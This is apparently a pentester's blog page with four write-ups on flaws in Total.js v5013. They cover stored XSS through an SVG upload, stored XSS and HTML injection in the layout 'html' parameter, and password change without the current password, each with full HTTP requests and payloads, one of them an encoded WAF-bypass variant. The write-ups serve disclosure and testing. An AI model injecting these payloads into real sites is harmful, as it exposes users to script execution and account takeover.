Sunday, 26 October 2025

Friday Fun Pentest Series - 46 - Stored Cross-Site Scripting (XSS) via SVG File Upload - totaljsv5013

Description

- It was noted that the applications file upload functionality was vulnerable to Stored Cross-Site Scripting (XSS) via an SVG image upload


Stored Cross-Site Scripting (XSS) via SVG File Upload


Steps to Reproduce:
  1. Login with user and visit "Layouts"
  2. Visit "Files" and click "Upload"
  3. Upload SVG image file with the contents below
  4. The payload would execute upon clicking "Download"


// HTTP POST Request - Uploading SVG Image File

POST /admin/upload/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]

------geckoformboundary6f751f7129e99de4fcc52bcce109c72
Content-Disposition: form-data; name="file0"; filename="evilsvgfile.svg"
Content-Type: image/svg+xml

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105">
<html><head><title>test</title></head><body><script>alert('xss');</script></body></html>
</svg>
------geckoformboundary6f751f7129e99de4fcc52bcce109c72--


// HTTP POST Response - Uploading SVG Image File

HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 17:06:41 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 129

[{"id":"JE6g1R1cx61f","name":"evilsvgfile.svg","type":"image/svg+xml","ext":"svg","size":159,"url":"/download/JE6g1R1cx61f.svg"}]


// HTTP GET Request - Triggering the Payload

GET /download/JE6g1R1cx61f.svg HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]


// HTTP GET Response - Triggering the Payload

HTTP/1.1 200 OK
last-modified: Sun, 26 Oct 2025 17:06:41 GMT
x-size: 159
etag: 858100
content-type: image/svg+xml
Date: Sun, 26 Oct 2025 17:09:19 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 159

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105">
<html><head><title>test</title></head><body><script>alert('xss');</script></body></html>
</svg>

at No comments:

Friday Fun Pentest Series - 45 - Stored HTML Injection - Layout Functionality - totaljsv5013

Description

- It was noted that the "Layout" functionality was vulnerable to Stored HTML Injection

Stored HTML Injection - Layout Functionality

Steps to Reproduce:
  1. Login with user and visit "Layouts"
  2. Click on "Create" and enter name for the layout
  3. Trap the HTTP POST request and in the "html" parameter value enter the Stored HTML Injection payload below
  4. Upon visiting the newly created layout the payload would execute

<h1>HTMLi</h1>


// HTTP POST Request - Creating New Layout

POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]

{"schema":"layouts_save","data":{"name":"xss-test-layout-name-test","html":"<h1>HTMLi</h1>"}}


// HTTP POST Response - Creating New Layout

HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:41:53 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 39

{"success":true,"value":"JE6c9M1cB61f"}


// HTTP GET Request - Triggering the Payload

POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]

{"schema":"layouts_html","data":{"id":"JE6c9M1cB61f"}}


// HTTP GET Response - Triggering the Payload

HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:46:18 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 60

{"name":"xss-test-layout-name-test","html":"<h1>HTMLi</h1>"}

at No comments:

Friday Fun Pentest Series - 44 - Stored Cross-Site Scripting (XSS) - Layout Functionality - totaljsv5013

Description

- It was noted that the "Layout" functionality was vulnerable to Stored Cross-Site Scripting (XSS) in the "html" parameter


Stored Cross-Site Scripting (XSS) - Layout Functionality

Steps to Reproduce:
  1. Login with user and visit "Layouts"
  2. Click on "Create" and enter name for the layout
  3. Trap the HTTP POST request and in the "html" parameter value enter the Cross-Site Scripting (XSS) payload below
  4. Upon visiting the newly created layout the payload would execute

"<Svg Only=1 OnLoad=confirm(atob(\"Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ==\"))>"


// HTTP POST Request - Creating New Layout

POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]

{"schema":"layouts_save","data":{"name":"xss-test-layout-name-test","html":"<Svg Only=1 OnLoad=confirm(atob(\"Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ==\"))>"}}


// HTTP POST Response - Creating New Layout

HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:33:35 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 39

{"success":true,"value":"JE6ar71cU61f"}


// HTTP GET Request - Triggering the Payload

POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]

{"schema":"layouts_html","data":{"id":"JE6ar71cU61f"}}



// HTTP GET Response - Triggering the Payload

HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:39:17 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 117

{"name":"xss-test-layout-name-test","html":"<Svg Only=1 OnLoad=confirm(atob(\"Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ==\"))>"}



at No comments:

Friday Fun Pentest Series - 43 - Current Password not Required When Changing Password - totaljsv5013

Description

- It was noted that the application password change functionality did not require the current password for the user to change their password


Current Password not Required When Changing Password

Steps to Reproduce:
  1. Login with user and click on profile icon
  2. Select "Change Credentials"
  3. The user would not be required to enter current password for updating their password

// HTTP POST Request - Changing Password

POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]

{"schema":"admin_save","data":{"name":"John Connor","login":"gz82g8WYq3","password":"Passw0rd!"}}


// HTTP Response - Changing Password

HTTP/1.1 200 OK
set-cookie: NPgdS=13030-39383d41540751460a15064b0f7449766a261756481745550d1f5f05414b061f5e6456343a630323750702160307415f584656405e390e3e38360e591d471c0619711511121d111f4f3a023530306156510b014f0d5045; Expires=Wed, 26 Nov 2025 16:25:39 GMT; Path=/; SameSite=Lax
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:25:44 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 16

{"success":true}

at No comments:
Subscribe to: Comments (Atom)

Friday Fun Pentest Series - 46 - Stored Cross-Site Scripting (XSS) via SVG File Upload - totaljsv5013

Description - It was noted that the applications file upload functionality was vulnerable to Stored Cross-Site Scripting (XSS) via an SVG im...